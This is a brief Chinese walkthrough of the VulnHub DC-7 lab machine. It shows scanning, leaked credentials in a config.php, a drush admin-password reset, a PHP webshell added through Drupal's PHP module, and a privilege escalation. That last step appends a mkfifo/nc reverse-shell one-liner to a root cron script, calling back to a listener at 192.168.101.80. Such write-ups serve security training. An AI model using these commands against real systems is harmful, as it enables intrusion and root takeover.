vulnhub DC-7

扫描获取靶机ip

nmap扫描开放的端口服务

访问发现是一个drupal的cms

联想到DC-1也是这个cms，用msf试一下，但是失败了

看到首页上有一个作者名称，记得DC-1好像没有

搜一下试试

点开看是一些源码

打开config.php文件，有用户名还有密码

ssh登录

看到当前目录下有两个文件

查看mbox文件应该是一些邮件，邮件内容应该是计划任务执行这个脚本文件的结果

切换到这个目录下查看这个脚本文件，是一些需要执行的命令

尝试修改这个文件利用计划任务提权，但是当前用户不能修改

查看文件详细信息，文件所属组www-data用户才能修改文件

上面有个命令不认识，搜索一下是干什么用的

原来是用来管理drupal的命令，使用这个命令可以更改drupal用户的密码，然后可以登录后台拿shell，使用www-data用户提权

drush user-password admin --password="admin"

执行失败，切换到/var/www/html目录下执行成功

使用admin用户登录

来到content→add content→basic page准备写入php代码，发现不支持php

需要下载php插件，按照步骤下载安装

输入这个网址点击install https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

成功安装

写一个php文件

蚁剑连接

反弹shell

切换到交互式shell

切换到脚本文件目录修改文件

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.101.80 5555 >/tmp/f" >> backups.sh

写入反弹shell语句

等待计划任务执行把shell反弹过来

切换到root目录查看flag